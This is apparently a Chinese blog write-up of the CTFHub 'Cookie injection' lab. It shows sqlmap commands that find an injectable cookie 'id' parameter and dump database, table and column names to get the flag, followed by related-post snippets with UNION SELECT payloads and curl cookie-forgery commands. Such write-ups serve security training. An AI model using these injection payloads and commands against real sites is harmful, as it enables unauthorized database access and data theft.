CTFHub-Cookie注入-wp

最新推荐文章于 2025-09-19 08:16:51 发布
原创 最新推荐文章于 2025-09-19 08:16:51 发布 · 232 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#wp

本文介绍如何使用sqlmap工具配合BurpSuite进行SQL注入攻击。通过设置代理截取HTTP请求并利用sqlmap进行自动化扫描,发现并利用Cookie中的参数注入漏洞。文章详细展示了从发现漏洞到获取敏感数据的全过程。

Cookie注入

sqlmap

  • 设置代理,使用BurpSuite进行截断,并复制出Request信息,放置于txt文件中

  • 使用

    python sqlmap.py -r 123.txt --level=2

    进行扫描

在这里插入图片描述

​ 发现存在Cookie中id参数的注入漏洞

  • 使用

    python sqlmap.py -u "..." --dbs

    爆出数据库名

  • python sqlmap.py -u "..." -D sqli -tables

    爆出表名

  • python sqlmap.py -u "..." -D sqli -T pmawelsyuy --columns

    爆出表结构
    在这里插入图片描述

  • 拿到flag

在这里插入图片描述

CTFHub | Cookie
尼泊罗河伯的博客
09-29 3456
根据题目描述内容,这是一道关于浏览器 Cookie 的问题。网页提示只有管理员才能获得flag,那么可以通过修改 Cookie 值,将 0(False) 改为 1(True) 获得此题 flag 。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1064
CTFHUB SQL
CTFHUB Cookie
孙轶扬
04-09 1797
#题目 打开环境,会发现需要admin才能拿到旗子。检查cookie,发现name已经是admin。 #解题 使用控制台,curl命令的--cookie参数,传入cookie。 curl challenge-f83536cf678926e2.sandbox.ctfhub.com:10080/ --cookie "admin=1;" 如图,这样就能得到旗子了。 #反思 在得到正确答案之前,我进...
CTFHub HTTP协议通关笔记:Cookie欺骗 原理详解与渗透实战
最新发布
mooyuan的网络安全博客
09-19 1198
本文详细介绍了CTFHub平台"HTTP协议-Cookie"关卡的渗透过程。首先讲解了Cookie的核心原理:服务器创建、客户端存储、自动携带、服务器识别用户状态四步机制。通过靶场实战演示了如何利用Cookie欺骗获取管理员权限:1)访问靶场发现Cookie值为admin=0;2)使用BurpSuite抓包后修改为admin=1;3)成功获取flag值。该案例揭示了客户端状态管理的安全风险,建议服务器端建立可靠的会话机制,不能信任客户端传来的权限参数。
CTFhub-Cookie
weixin_39579781的博客
01-06 556
图片显示需要admin权限。
CTFHUB-WEB--cooki注入wp
DSX666_888的博客
10-23 238
<1、sqlmap自动化工具> 1、检查漏洞(肯定有) 语句: sqlmap -u "网址" 2、查库(?1即为库名)、查表(?2即为表名)、查列(?3即为列名)、查数据 sqlmap -u "?" --cookie "id=0" --level 2 --dbs sqlmap -u "?" --cookie "id=0" --level 2 -D ?1 --tables sqlmap -u "?" --cookie "id=0" --level 2 -D ?1 -T ?2 --.
CTFHUB-HTTP-Cookie
qq_53755216的博客
01-22 728
文章目录一、题目二、解题思路1.管他的先抓下包2.发现cookie中admin=0 ,于是我乱改改为1,结果就对了!!!出乎我自己的预料!!!总结 一、题目 hello guest. only admin can get flag. 二、解题思路 1.管他的先抓下包 2.发现cookie中admin=0 ,于是我乱改改为1,结果就对了!!!出乎我自己的预料!!! 总结 神奇!Amazing! ...
ctfhub web SQL注入 wp
m0_55854679的博客
07-25 521
数字型注入 方法1 打开题目链接,题目提示为数字型注入,尝试输入1 使用order by查询字段数为2 id=-1 union select 1,2# 查看回显位置 4. id=-1 union select 1,database()# 获得数据库名 5. 查询数据库中的表名 -1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' 6.查询flag列中的
【CTF整理】CTFhub技能树-Web-SQL注入
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
05-10 2431
【CTF整理】CTFhub技能树-Web-SQL注入 目录【CTF整理】CTFhub技能树-Web-SQL注入SQL整数型注入SQL字符型注入SQL报错注入SQL布尔型注入SQL时间注入MySQL结构Cookie注入UA注入Referer注入 SQL整数型注入 确定闭合方式 :1 确定报错位有2个,(我选2注入点) 得到库名 得到表名 得到列名 得到flag SQL字符型注入 确定闭合方式:1’ 【步骤和整形一样,不再使用,我这里采用sqlmap】 核心语法: sqlmap -u "url+参
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2649
数据库注入
ctfhub技能树web
m0_58030673的博客
05-19 1584
ctfhub技能树web方向wp
学习记录 3 —— CTFHub Cookie
m0_56200845的博客
10-29 889
题目如上。 审题:Cookie欺骗、认证、伪造。这道题涉及到cookie的相关知识。 相关知识: Cookie简单来说就类似于现实生活中身份证这类东西,用于认证登录者的。 其产生原因与原理:HTTP 是无状态协议,它不对之前发生过的请求和响应的状态进行管理。也就是说, 无法根据之前的状态进行本次的请求处理。假设要求登录认证的 Web 页面本身无法进行状态的管理(不记录已登录的状态),那么每次跳转新页面不是要再次登录,就是要在每次请求报文中附加参数来管理登录状态。不可否认,无状态协议当然也有它的...
CTFHUB HTTP协议 Cookie
qq_75120258的博客
10-12 347
Cookie是服务器存储在客户端的一段文本信息,当客户端发送访问请求时服务器会发送给客户端一个cookie并存储,第二次客户端再次发送访问请求时cookie会被包含在Http头文件发送给服务器,浏览器检查到有cookie信息就会默认这是已经验证过的用户,不会进行第二次验证。
CTFHub技能树之WEB:Cookie注入
weixin_48799157的博客
03-20 1795
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
CTFHubCookie注入
sGanYu
07-26 2004
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
CTFHub - Cookie注入
Have_a_great_day的博客
09-10 1329
因为在CTFHub中web内SQL板块使用的是同一个数据库,所以列数是相同的。table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
【CTF】CTFHub------web-HTTP协议-Cookie
从零开始的网安生活
07-22 304
cookie 1.链接复制到搜狐,捕获,发送到Repeater 2.根据网页提示找到admin ①尝试修改0为1(yes/no 等)②单击go ③获得flag
ctfhub-HTTP协议-Cookie
m0_62094846的博客
11-06 798
这是道cookie题,又说要admin才能得到flag,应该是要伪造cookie,抓包 一开始我以为admin后面要写用户名或者密码啥的,然后就爆破,一直爆不出来 ,然后把0改成1,就可以出来flag 我在网上查时,cookie的一行应该为一条数据。也就是说这条数据的“名字”叫做admin,其值为0,改成就可以出来,但我用2,又不行了。 Cookie组成: Cookie是一段不超过4KB的小型文本数据,由一个名称(Name)、一个值(Value)和其它几个用于控制Cook...
CTFHUB之HTTP协议-cookie
keaidxxn的博客
04-19 508
点击cookie: 点击开启题目后,再在显示的页面里点击相关链接: 点击链接之后显示出以下网页信息: 因为这里提示只有admin可以拿到flag,并且这道题的名字为cookie,于是F12,查看相关信息: 在cookie里找到一个admin,发现它 的value值为0,于是把0改为1,并且刷新一下页面: 成功拿到flag了!!! ...
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不想弹solo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值